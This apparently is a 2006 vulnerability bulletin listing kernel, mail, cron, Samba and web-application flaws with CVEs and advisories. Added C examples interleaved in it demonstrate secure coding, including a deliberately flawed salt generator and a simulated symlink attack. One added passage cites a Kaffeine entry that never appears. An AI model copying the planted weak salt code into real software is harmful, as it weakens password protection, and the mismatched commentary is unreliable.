Linux kernel 2.6 prior to 2.6.12.1

A vulnerability has been reported in the 'restore_sigcontext()' function due to a failure to restrict access to the 'ar.rsc' register, which could let a malicious user cause a Denial of Service or obtain elevated privileges.

Linux Kernel

SUSE

RedHat

RedHat

Debian

Conectiva

Debian

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel 64 Bit 'AR-RSC' Register Access

CVE-2005-1761

Security Tracker Alert ID: 1014275, June 23, 2005

SUSE Security Announcement, SUSE-SA:2005:044, August 4, 2005

RedHat Security Advisory, RHSA-2005:663-19, September 28, 2005

RedHat Security Advisory, RHSA-2005:514-46, October 5, 2005

Debian Security Advisories, DSA 921-1 & 922-1, December 14, 2005

Conectiva Linux Announcement, CLSA-2006:1059, January 2, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.12.1

A vulnerability has been reported due to insufficient authorization before accessing a privileged function, which could let a malicious user bypass IPSEC policies.

Ubuntu

This issue has been addressed in Linux kernel 2.6.13-rc7.

SUSE

RedHat

RedHat

Mandriva

Conectiva

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel IPSec Policies Authorization Bypass

CVE-2005-2555

Ubuntu Security Notice, USN-169-1, August 19, 2005

Security Focus, Bugtraq ID 14609, August 19, 2005

Security Focus, Bugtraq ID 14609, August 25, 2005

SUSE Security Announcement, SUSE-SA:2005:050, September 1, 2005

RedHat Security Advisory, RHSA-2005:663-19, September 28, 2005

RedHat Security Advisory, RHSA-2005:514-46, October 5, 2005

Mandriva Linux Security Advisory, MDKSA-2005:218, November 30, 2005

Conectiva Linux Announcement, CLSA-2006:1059, January 2, 2006

Debian Security Advisory, DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.14

A Denial of Service vulnerability has been reported in 'sysctl.c' due to an error when handling the un-registration of interfaces in '/proc/sys/net/ipv4/conf/'.

Upgrades available

Ubuntu

RedHat

RedHat

RedHat

RedHat

DSA-1017

DSA-1018

DSA 1018-2

There is no exploit code required.

Linux Kernel 'Sysctl' Denial of Service

CVE-2005-2709

Secunia Advisory: SA17504, November 9, 2005

Ubuntu Security Notice, USN-219-1, November 22, 2005

RedHat Security Advisory, RHSA-2006:0101-9, January 17, 2006

RedHat Security Advisory, RHSA-2006:0140-9, January 19, 2006

RedHat Security Advisories, RHSA-2006:0190-5 & RHSA-2006:0191-9, February 1, 2006

Debian Security Advisory, DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.14, 2.5.0-2.5.69, 2.4-2.4.32, 2.3, 2.3.x, 2.3.99 pre1-pre7, 2.2-2.2.27, 2.1, 2.1.x, 2.1.89, 2.0.28-2.0.39

A vulnerability has been reported due to the way console keyboard mapping is handled, which could let a malicious user modify the console keymap to include scripted macro commands.

Mandriva

Fedora

Conectiva

SmoothWall

DSA-1017

DSA-1018

DSA 1018-2

There is no exploit code required; however, a Proof of Concept exploit has been published.

Linux Kernel Console Keymap Arbitrary Command Injection

CVE-2005-3257

Security Focus, Bugtraq ID: 15122, October 17, 2005

Mandriva Linux Security Advisories, MDKSA-2005:218, 219 & 220, November 30, 2005

Fedora Update Notification, FEDORA-2005-1138, December 13, 2005

Conectiva Linux Announcement, CLSA-2006:1059, January 2, 2006

SmoothWall Advisory, March 15, 2006

Debian Security Advisory, DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.14; SuSE Linux Professional 10.0 OSS, Linux Personal 10.0 OSS; RedHat Fedora Core4

A Denial of Service vulnerability has been reported in 'ptrace.c' when 'CLONE_THREAD' is used due to a missing check of the thread's group ID when trying to determine whether the process is attempting to attach to itself.

Upgrades available

Fedora

SUSE

Mandriva

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel PTrace 'CLONE_THREAD' Denial of Service

CVE-2005-3783

Secunia Advisory: SA17761, November 29, 2005

Fedora Update Notification, FEDORA-2005-1104, November 28, 2005

SuSE Security Announcement, SUSE-SA:2005:067, December 6, 2005

SUSE Security Announcement, SUSE-SA:2005:068, December 14, 2005

Mandriva Security Advisory, MDKSA-2006:018, January 20, 2006

Debian Security Advisory, DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.15

A Denial of Service vulnerability has been reported in the 'time_out_leases()' function because it logs each broken lease with 'printk()', which lets a local malicious user consume large amounts of kernel log space.

Patches available

Trustix

RedHat

RedHat

DSA-1017

DSA-1018

DSA 1018-2

An exploit script has been published.

Linux Kernel PrintK Local Denial of Service

CVE-2005-3857

Security Focus, Bugtraq ID: 15627, November 29, 2005

Trustix Secure Linux Security Advisory, TSLSA-2005-0070, December 9, 2005

RedHat Security Advisory, RHSA-2006:0101-9, January 17, 2006

RedHat Security Advisory, RHSA-2006:0140-9, January 19, 2006

Debian Security Advisory, DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

RealOne Helix Player 1.x, RealOne Player v1, v2, RealPlayer 10.x, 8, RealPlayer Enterprise 1.x; Gentoo Linux; SuSE Novell Linux Desktop 9.0, Linux Professional 10.0 OSS, 9.3 x86_64, 9.3, 9.2 x86_64, 9.2, Linux Personal 10.0 OSS, 9.3 x86_64, 9.3, 9.2 x86_64, 9.2

Multiple vulnerabilities have been reported: a buffer overflow vulnerability was reported in the handling of the 'chunked' Transfer-Encoding method due to a boundary error, which could let a remote malicious user execute arbitrary code; a buffer overflow vulnerability was reported when processing SWF files due to a boundary error, which could let a remote malicious user execute arbitrary code; and a vulnerability was reported due to the incorrect use of the 'CreateProcess()' API when executing other programs, which could let a remote malicious user execute arbitrary code.

Updates available

Gentoo

SuSE

RedHat

A Proof of Concept exploit script, realplayer-swf-PoC.pl.txt, has been published.

RealNetworks Products Multiple Buffer Overflow

CVE-2005-2922
CVE-2005-2936
CVE-2006-0323

7
(CVE-2005-2936)

7
(CVE-2006-0323)

Secunia Advisory: SA19358, March 27, 2006

Gentoo Linux Security Advisory, GLSA 200603-24, March 26, 2006

SUSE Security Announcement, SUSE-SA:2006:018, March 23, 2006

RedHat Security Advisory, RHSA-2006:0257-9, March 22, 2006

US-CERT VU#231028

US-CERT VU#172489

Packetstorm, April 1, 2006

Multiple Vendors

SuSE Linux Professional 10.0 OSS, 10.0, Personal 10.0 OSS; Linux kernel 2.6-2.6.13, 2.4-2.4.32

A Denial of Service vulnerability has been reported in the IPv6 flow label handling code.

Upgrades available

SUSE

RedHat

RedHat

Mandriva

RedHat

RedHat

Mandriva

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel IPv6 Flow Label Denial of Service

CVE-2005-3806

Security Focus, Bugtraq ID: 15729, December 6, 2005

SUSE Security Announcement, SUSE-SA:2005:067, December 6, 2005

SUSE Security Announcement, SUSE-SA:2005:068, December 14, 2005

RedHat Security Advisory, RHSA-2006:0101-9, January 17, 2006

RedHat Security Advisory, RHSA-2006:0140-9, January 19, 2006

Mandriva Security Advisory, MDKSA-2006:018, January 20, 2006

RedHat Security Advisories, RHSA-2006:0190-5 & RHSA-2006:0191-9, February 1, 2006

Mandriva Security Advisory, MDKSA-2006:044, February 21, 2006

Debian Security Advisory, DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Ubuntu Linux 5.04 powerpc, i386, amd64, 4.1 ppc, ia64, ia32; Linux kernel 2.6.8, 2.6.8 rc1, 2.6.10, 2.6.10 rc2

A remote Denial of Service vulnerability has been reported in the kernel driver for compressed ISO file systems when attempting to mount a malicious compressed ISO image.

Ubuntu

SUSE

Mandriva

Conectiva

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel ISO File System Remote Denial of Service

CVE-2005-2457

Ubuntu Security Notice, USN-169-1, August 19, 2005

SUSE Security Announcement, SUSE-SA:2005:050, September 1, 2005

Mandriva Linux Security Advisory, MDKSA-2005:218, November 30, 2005

SUSE Security Announcement, SUSE-SA:2005:068, December 14, 2005

Conectiva Linux Announcement, CLSA-2006:1059, January 2, 2006

Debian Security Advisory, DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Ubuntu Linux 5.10 powerpc, i386, amd64, 5.04 powerpc, i386, amd64, 4.1 ppc, ia64, ia32;
MandrakeSoft Linux Mandrake 2006.0 x86_64, 2006.0, 10.2 x86_64, 10.2, 10.1 x86_64, 10.1, Corporate Server 3.0 x86_64, 3.0;
GNU Mailman 2.1-2.1.5, 2.0-2.0.14

A remote Denial of Service vulnerability has been reported in the email date parsing functionality due to an error in the handling of dates.

Mandriva

Ubuntu

Debian

RedHat

Trustix

SGI

There is no exploit code required.

GNU Mailman Remote Denial of Service

CVE-2005-4153

Security Focus, Bugtraq ID: 16248, January 16, 2006

Ubuntu Security Notice, USN-242-1 January 16, 2006

Debian Security Advisory, DSA-955-1, January 25, 2006

RedHat Security Advisory, RHSA-2006:0204-10, March 7, 2006

Trustix Secure Linux Security Advisory #2006-0012, March 10, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

Multiple Vendors

util-vserver 0.30.209, 0.30.210; Debian Linux 3.1, sparc, s/390, ppc, mipsel, mips, m68k, ia-64, ia-32, hppa, arm, amd64, alpha

A vulnerability has been reported in the util-vserver package 'suexec,' which could let a remote malicious user obtain elevated privileges.

No workaround or patch available at time of publishing.

There is no exploit code required.

Util-VServer Elevated Privileges

CVE-2006-1656

Not Available

Security Focus, Bugtraq ID: 17361, April 4, 2006

Openwall

Openwall crypt_blowfish 0.4.7 & prior

A vulnerability has been reported in the 'crypt_gensalt' functions for BSDI-style extended DES-based and FreeBSD-style MD5-based password hashes because they do not evenly and randomly distribute salts, which makes it easier for malicious users with a stolen copy of the password file to guess passwords due to the increased number of salt collisions.

Updates available

Currently we are not aware of any exploits for this vulnerability.

Openwall 'crypt_blowfish' Information Disclosure

CVE-2006-0591

Secunia Advisory: SA18772, February 8, 2006
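The following C program is an added illustration, not code from crypt_blowfish or the Openwall project, of why the distribution of salts matters. It places a hypothetical flawed generator (a loop that reads the same six bits of its random word for every salt character, a bug assumed here for illustration and not the actual crypt_blowfish defect) beside a correct one that consumes fresh bits for each character, then counts how many distinct salts each produces in a batch. The itoa64 alphabet is the standard crypt(3) salt alphabet; the deterministic PRNG is a stand-in for /dev/urandom, assumed so the comparison is repeatable.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SALT_LEN 8
#define NSALTS   4096

/* Standard crypt(3) salt alphabet, 64 symbols = 6 bits per character. */
static const char itoa64[] =
    "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

/* Deterministic stand-in for /dev/urandom (splitmix64) so the result is
 * repeatable; a real implementation must read the kernel RNG. */
static uint64_t rng_state = 0x1234567890abcdefULL;

static uint64_t next_random64(void)
{
    uint64_t z = (rng_state += 0x9E3779B97F4A7C15ULL);
    z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL;
    z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL;
    return z ^ (z >> 31);
}

/* Hypothetical flawed generator: 64 bits of entropy are fetched, but the
 * loop never advances, so all eight characters come from the same 6 bits
 * and only 64 distinct salts are possible. */
static void gensalt_flawed(char out[SALT_LEN + 1])
{
    uint64_t value = next_random64();
    for (int i = 0; i < SALT_LEN; i++)
        out[i] = itoa64[value & 0x3f];   /* BUG: value is never shifted */
    out[SALT_LEN] = '\0';
}

/* Correct generator: each character consumes its own 6 fresh bits. */
static void gensalt_correct(char out[SALT_LEN + 1])
{
    uint64_t value = next_random64();
    for (int i = 0; i < SALT_LEN; i++) {
        out[i] = itoa64[value & 0x3f];
        value >>= 6;
    }
    out[SALT_LEN] = '\0';
}

/* Generates n salts with gen() and returns how many distinct strings appear.
 * Quadratic comparison is fine at this size and keeps the check obvious. */
int count_distinct_salts(void (*gen)(char *), int n)
{
    static char salts[NSALTS][SALT_LEN + 1];
    int distinct = 0;
    if (n > NSALTS)
        n = NSALTS;
    for (int i = 0; i < n; i++)
        gen(salts[i]);
    for (int i = 0; i < n; i++) {
        int seen = 0;
        for (int j = 0; j < i; j++)
            if (memcmp(salts[i], salts[j], SALT_LEN) == 0) { seen = 1; break; }
        if (!seen)
            distinct++;
    }
    return distinct;
}

int main(void)
{
    printf("flawed : %d distinct salts out of %d\n",
           count_distinct_salts(gensalt_flawed, NSALTS), NSALTS);
    printf("correct: %d distinct salts out of %d\n",
           count_distinct_salts(gensalt_correct, NSALTS), NSALTS);
    return 0;
}
```

With the flawed generator every eight-character salt collapses to one of 64 values, so an attacker holding the password file can hash each candidate once per salt value and test it against every account sharing that salt; the correct generator yields 4096 distinct salts out of 4096, and the attacker must hash every candidate once per account.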

Paul Vixie

Vixie Cron 4.1

A vulnerability has been reported due to insecure creation of temporary files when crontab is executed with the '-e' option, which could let a malicious user obtain sensitive information.

Fedora

RedHat

RHSA-2006:0117-7

SGI

There is no exploit code required; however, a Proof of Concept exploit script has been published.

Vixie Cron Crontab Information Disclosure

CVE-2005-1038

Security Focus, Bugtraq ID: 13024, April 6, 2005

Fedora Update Notification, FEDORA-2005-320, April 15, 2005

Fedora Update Notifications, FEDORA-2005-550 & 551, July 12, 2005

RedHat Security Advisory, RHSA-2005:361-19, October 5, 2005

RedHat Security Advisory, RHSA-2006:0117-7, March 15, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

RedHat

RedHat initscripts 7.93.24, Enterprise Linux WS 4, ES 4, AS 4, Desktop 4.0

A vulnerability has been reported when the '/sbin/service' command is run due to an error when handling certain environment variables, which could let a malicious user obtain elevated privileges.

Updates available

SGI

Currently we are not aware of any exploits for this vulnerability.

Red Hat Initscripts Elevated Privileges

CVE-2005-3629

7

RedHat Security Advisory, RHSA-2006:0016-18, March 7, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

Samba.org

Samba 3.0.21, 3.0.21a-c

A vulnerability has been reported because the 'winbindd' daemon saves the machine trust account credentials to world-readable winbind log files in clear text, which could let a malicious user obtain sensitive information.

Patches available

Fedora

Trustix

There is no exploit code required.

Samba Machine Trust Account Information Disclosure

CVE-2006-1059

1.6

Secunia Advisory: SA19455, March 30, 2006

Trustix Secure Linux Security Advisory #2006-0018, April 4, 2006

Sendmail Consortium

Sendmail prior to 8.13.6

A vulnerability has been reported due to a race condition caused by the improper handling of asynchronous signals, which could let a remote malicious user execute arbitrary code.

Updates available

RHSA-2006:0264-8

RHSA-2006:0265-9

Fedora

Gentoo

AIX

Sun

SuSE

FreeBSD

Slackware

OpenBSD

Avaya

Debian

HP

NetBSD

SGI

F-Secure

SGI

A Proof of Concept exploit script, sendtest.c, has been published.

Sendmail Asynchronous Signal Handling Remote Code Execution

CVE-2006-0058

8

Internet Security Systems Protection Advisory, March 22, 2006

Technical Cyber Security Alert TA06-081A

US-CERT VU#834865

RedHat Security Advisories, RHSA-2006:0264-8 & RHSA-2006:0265-9, March 22, 2006

Sun(sm) Alert Notification, Sun Alert ID: 102262, March 24, 2006

Gentoo Linux Security Advisory, GLSA 200603-21, March 22, 2006

SUSE Security Announcement, SUSE-SA:2006:017, March 22, 2006

FreeBSD Security Advisory, FreeBSD-SA-06:13, March 22, 2006

Slackware Security Advisory, SSA:2006-081-01, March 22, 2006

Avaya Security Advisory, ASA-2006-074, March 24, 2006

Debian Security Advisory, DSA-1015-1, March 24, 2006

HP Security Bulletin, HPSBUX02108, March 27, 2006

NetBSD Security Advisory, NetBSD-SA2006-010, March 28, 2006

SGI Security Advisory, 20060302-01-P, March 22, 2006

F-Secure Security Bulletin, FSC-2006-2, March 28, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006
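As an added illustration of the signal-handling discipline behind this class of bug (not Sendmail's code, and not a reproduction of the Sendmail defect), the following C program processes a constructed SMTP-style dialogue under a timeout. The handler only sets a volatile sig_atomic_t flag and the main loop checks it at a safe point; the comments mark the heap operation that would be left inconsistent if the handler instead jumped out of it with longjmp() or touched the buffer itself. raise() stands in for a real alarm so the timing is deterministic, and the sample lines are constructed, not captured.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The only shared state an asynchronous handler may safely touch is a
 * volatile sig_atomic_t flag; everything else is deferred to the loop. */
static volatile sig_atomic_t timed_out = 0;

static void on_alarm(int sig)
{
    (void)sig;
    timed_out = 1;   /* no longjmp(), no free(), no stdio here */
}

/* Heap-backed buffer standing in for the non-reentrant state a mail
 * server holds while it reads a message. */
struct line_buf { char *data; size_t len; size_t cap; };

static int buf_append(struct line_buf *b, const char *s)
{
    size_t n = strlen(s);
    if (b->len + n + 1 > b->cap) {
        size_t ncap = (b->len + n + 1) * 2;
        /* realloc() is not async-signal-safe. A handler that longjmp()ed out
         * of this call would leave b->data pointing at freed or half-moved
         * memory, which the later cleanup path would then operate on. */
        char *p = realloc(b->data, ncap);
        if (p == NULL)
            return -1;
        b->data = p;
        b->cap = ncap;
    }
    memcpy(b->data + b->len, s, n);
    b->len += n;
    b->data[b->len] = '\0';
    return 0;
}

/* Consumes lines until done or until the timeout flag is seen at a safe
 * point. raise_at simulates the alarm firing just before line raise_at is
 * read (-1 = never). Returns the number of lines consumed; the consumed
 * text is copied to out. */
int read_message_deferred_timeout(const char *const *lines, int nlines,
                                  int raise_at, char *out, size_t outsz)
{
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_alarm;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGALRM, &sa, NULL);

    struct line_buf b = { NULL, 0, 0 };
    int consumed = 0;
    timed_out = 0;
    for (int i = 0; i < nlines; i++) {
        if (i == raise_at)
            raise(SIGALRM);      /* handler runs now and only sets the flag */
        if (timed_out)
            break;               /* checked between operations, never inside one */
        if (buf_append(&b, lines[i]) < 0)
            break;
        consumed++;
    }
    snprintf(out, outsz, "%s", b.data ? b.data : "");
    free(b.data);                /* cleanup runs on the normal path with consistent state */
    return consumed;
}

int timeout_was_seen(void)
{
    return timed_out != 0;
}

int main(void)
{
    /* Constructed sample dialogue, not a captured session. */
    static const char *const lines[] = {
        "MAIL FROM:<sender@example.com>\r\n",
        "RCPT TO:<rcpt@example.com>\r\n",
        "DATA\r\n",
    };
    char out[256];
    int n = read_message_deferred_timeout(lines, 3, 1, out, sizeof out);
    printf("consumed %d line(s), timed out: %d\n", n, timeout_was_seen());
    return 0;
}
```

The check a reviewer applies to any handler is the async-signal-safe list in signal-safety(7): if the handler calls anything outside it, or transfers control out of interrupted code with longjmp(), the program's heap, stdio and locking state can be whatever the interrupted function left behind.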

storeBackup

storeBackup 1.18-1.18.4

A vulnerability has been reported due to the insecure creation of temporary files, which could let a malicious user obtain sensitive information.

Upgrades available

SUSE

Debian

There is no exploit code required.

StoreBackup Insecure Temporary File Creation

CVE-2005-3146
CVE-2005-3147
CVE-2005-3148

2.3
(CVE-2005-3146)

2.3
(CVE-2005-3147)

5.6
(CVE-2005-3148)

Security Focus, Bugtraq ID: 14985, September 30, 2005

SUSE Security Summary Report, SUSE-SR:2005:021, September 30, 2005

Debian Security Advisory, DSA-1022-1, April 4, 2006
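Both the Vixie Cron crontab entry above and this storeBackup entry describe the same defect class: a temporary file created under a predictable name, or with permissions that let another local user read or replace it. The C program below is an added example, not code from either project, of the hardened pattern: mkstemp() with a 0600 mode, working through the returned descriptor rather than reopening the path, and, where a fixed name cannot be avoided, O_EXCL|O_NOFOLLOW so a pre-planted file or symlink fails the open. The /tmp directory, the 'crontab.' prefix and the simulated symlink attack are assumptions made for the demonstration.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Creates a scratch file that no other local user can pre-create, read or
 * replace: unpredictable name via mkstemp(), mode 0600, and the caller keeps
 * using the fd instead of reopening by name. Returns the fd or -1; the chosen
 * path is written to pathbuf so the caller can unlink it when done. */
int create_private_tempfile(const char *dir, char *pathbuf, size_t pathsz)
{
    int n = snprintf(pathbuf, pathsz, "%s/crontab.XXXXXX", dir);
    if (n < 0 || (size_t)n >= pathsz)
        return -1;
    mode_t old = umask(077);
    int fd = mkstemp(pathbuf);
    umask(old);
    if (fd < 0)
        return -1;
    if (fchmod(fd, 0600) < 0) {   /* mkstemp already uses 0600; make it explicit */
        close(fd);
        unlink(pathbuf);
        return -1;
    }
    return fd;
}

/* When a program insists on a fixed name (the pattern behind the two
 * advisories), O_EXCL|O_NOFOLLOW makes a pre-placed file or symlink fail the
 * open with EEXIST instead of being silently written through. */
int open_fresh_file(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Permission bits of an open descriptor, or -1. */
int file_mode_bits(int fd)
{
    struct stat st;
    if (fstat(fd, &st) < 0)
        return -1;
    return (int)(st.st_mode & 0777);
}

/* Simulated attack: another user plants a symlink at the predictable name
 * before the victim creates it. Returns 1 if the hardened open refuses it,
 * 0 if the link was followed, -1 on setup error. */
int symlink_attack_blocked(const char *dir)
{
    char link_path[4096], target[4096];
    snprintf(link_path, sizeof link_path, "%s/crontab.1234", dir);  /* predictable name */
    snprintf(target, sizeof target, "%s/victim-file", dir);
    unlink(link_path);
    if (symlink(target, link_path) < 0)
        return -1;
    int fd = open_fresh_file(link_path);
    int blocked = (fd < 0 && errno == EEXIST);
    if (fd >= 0)
        close(fd);
    unlink(link_path);
    unlink(target);
    return blocked;
}

int main(void)
{
    char path[4096];
    int fd = create_private_tempfile("/tmp", path, sizeof path);
    if (fd < 0) {
        perror("create_private_tempfile");
        return 1;
    }
    printf("%s mode %04o, symlink attack blocked: %d\n",
           path, file_mode_bits(fd), symlink_attack_blocked("/tmp"));
    close(fd);
    unlink(path);
    return 0;
}
```

The edge case worth remembering is that O_EXCL with O_CREAT fails on a symlink regardless of where it points, so even a dangling link planted by the attacker is enough to refuse the open; without O_EXCL the victim would follow the link and write its data wherever the attacker chose.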

Sun Microsystems, Inc.

Solaris 9.0 x86, 9.0, 8.0 x86, 8.0; Sun Cluster 3.1 4/04

A vulnerability has been reported in the SunPlex Manager GUI due to an unspecified error, which could let a malicious user obtain sensitive information.

Update information

There is no exploit code required.

Sun Cluster SunPlex Manager Information Disclosure

CVE-2006-1601

1

Sun(sm) Alert Notification, Sun Alert ID: 102278, March 29, 2006

The Open Group

Open Motif 2.2.3

Two buffer overflow vulnerabilities have been reported in libUil (User Interface Language): one in 'diag_issue_diagnostic()' due to the use of the unbounded vsprintf() libc function, and one in 'open_source_file()' due to the use of strcpy(); either could let a remote malicious user execute arbitrary code.

Gentoo

RedHat

Currently we are not aware of any exploits for these vulnerabilities.

Open Motif libUil Buffer Overflows

CVE-2005-3964

Security Focus, Bugtraq ID: 15678, December 2, 2005

Gentoo Linux Security Advisory, GLSA 200512-16, December 28, 2005

Red Hat Security Advisory, RHSA-2006:0272-01, April 4, 2006
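Both the Kaffeine 'http_peek()' entry above (building an HTTP request for a remote playlist into a fixed buffer) and the libUil entries here (vsprintf() and strcpy() into fixed buffers) come down to formatting or copying caller-controlled data without a length bound. The C code below is an added example, not code from Kaffeine or Open Motif, of the bounded replacements: a vsnprintf()-based formatter that reports failure instead of truncating silently, a length-checked copy, and a request builder that uses them. The buffer sizes, host and path values are assumptions made for the demonstration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define NAME_MAX_LEN 128
#define REQ_MAX_LEN  256

/* Bounded replacement for the vsprintf() pattern: formats into a fixed
 * buffer and returns -1 (with an empty buffer) instead of writing past the
 * end or handing back a silently truncated string. */
int diag_format(char *buf, size_t bufsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(buf, bufsz, fmt, ap);
    va_end(ap);
    if (n < 0 || (size_t)n >= bufsz) {
        buf[0] = '\0';
        return -1;
    }
    return n;
}

/* Bounded replacement for strcpy(): copies only if src and its terminator
 * fit, otherwise returns -1 and leaves dst untouched. */
int copy_name(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstsz)
        return -1;
    memcpy(dst, src, n + 1);
    return (int)n;
}

/* Builds "GET <path> HTTP/1.0\r\nHost: <host>\r\n\r\n", the kind of request a
 * player sends for a remote playlist, into a fixed buffer. Returns the
 * request length, or -1 when host and path are too long to fit. */
int build_playlist_request(char *req, size_t reqsz,
                           const char *host, const char *path)
{
    return diag_format(req, reqsz, "GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", path, host);
}

int main(void)
{
    char req[REQ_MAX_LEN], name[NAME_MAX_LEN], longpath[600];
    memset(longpath, 'A', sizeof longpath - 1);   /* oversized attacker-chosen path */
    longpath[sizeof longpath - 1] = '\0';

    printf("normal request: %d\n",
           build_playlist_request(req, sizeof req, "example.com", "/list.m3u"));
    printf("oversized path: %d\n",
           build_playlist_request(req, sizeof req, "example.com", longpath));
    printf("oversized name: %d\n", copy_name(name, sizeof name, longpath));
    return 0;
}
```

The return-value check is the part that is easy to drop: snprintf() and vsnprintf() never overflow, but they report the length the full output would have had, and a caller that ignores it will happily send a truncated request or log a truncated diagnostic.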

xine

xine-lib 1.1.1

A buffer overflow vulnerability has been reported when processing a malformed MPEG stream due to a failure to properly bounds check user-supplied input data prior to copying it to an insufficiently-sized memory buffer, which could let a remote malicious user execute arbitrary code.

No workaround or patch available at time of publishing.

A Proof of Concept exploit script, xinelib_poc.pl, has been published.

Xine-Lib Malformed MPEG Stream Buffer Overflow

Not Available

Security Focus, Bugtraq ID: 17370, April 4, 2006

Multiple Operating Systems - Windows/UNIX/Linux/Other

Vendor & Software Name

Description

Common Name

CVSS

Resources

3dsrc.com

MonAlbum 0.8.7

SQL injection vulnerabilities have been reported in 'image_agrandir.php' due to insufficient sanitization of the 'pnom' and 'pcourriel' parameters and in 'index.php' due to insufficient sanitization of the 'pc' parameter, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

MonAlbum SQL Injection

CVE-2006-1585

4.7

Secunia Advisory: SA19503, April 3, 2006

AngelineCMS

AngelineCMS 0.8.1

A file include vulnerability has been reported in 'Loadkernel.PHP' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, an exploit script, angelineCMS.pl, has been published.

AngelineCMS Remote File Include

CVE-2006-1653

Not Available

Security Focus, Bugtraq ID: 17371, April 4, 2006

Apache Software Foundation

libapreq2 2.0.6

A remote Denial of Service vulnerability has been reported due to errors in the 'apreq_parse_headers()' and 'apreq_parse_urlencoded()' functions.

Update available

Debian

DSA 1000-2

Currently we are not aware of any exploits for this vulnerability.

Apache Libapreq2 Remote Denial of Service

CVE-2006-0042

2.3

Security Focus, Bugtraq ID: 16710, February 17, 2006

Debian Security Advisory, DSA-1000-1, March 14, 2006

Debian Security Advisory, DSA 1000-2, April 3, 2006

Apache Software Foundation

Struts prior to 1.2.9

Multiple vulnerabilities have been reported: a vulnerability was reported in 'RequestProcessor' because all actions can be cancelled, which could let a remote malicious user bypass security restrictions; a remote Denial of Service vulnerability was reported in 'ActionForm' because the public method 'getMultipartRequestHandler()' gives access to elements in 'CommonsMultipartRequestHandler' and 'BeanUtils'; and a vulnerability was reported in 'LookupDispatchAction' due to insufficient sanitization, which could let a remote malicious user execute arbitrary HTML and script code.

Updates available

Vulnerabilities can be exploited through a web client.

Apache Struts Multiple Vulnerabilities

CVE-2006-1546
CVE-2006-1547
CVE-2006-1548

7
(CVE-2006-1546)

3.3
(CVE-2006-1547)

2.3
(CVE-2006-1548)

Security Tracker Alert ID: 1015856, April 1, 2006

aphpkb

aphpkb 0.57

Multiple Cross-Site Scripting vulnerabilities have been reported due to insufficient sanitization of user-supplied input before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

Andy's PHP Knowledgebase Multiple Cross-Site Scripting

CVE-2006-1438

7

Security Focus, Bugtraq ID: 17377, March 27, 2006

Arab Portal

Arab Portal 2.0.1 Stable

Multiple input-validation vulnerabilities have been reported including Cross-Site Scripting and SQL injection, which could let a remote malicious user execute arbitrary HTML, script code, and SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, Proof of Concept exploits have been published.

ArabPortal Multiple Input Validation
Security Focus, Bugtraq ID: 17375, April 4, 2006

aWeb Labs

aWebBB 1.2

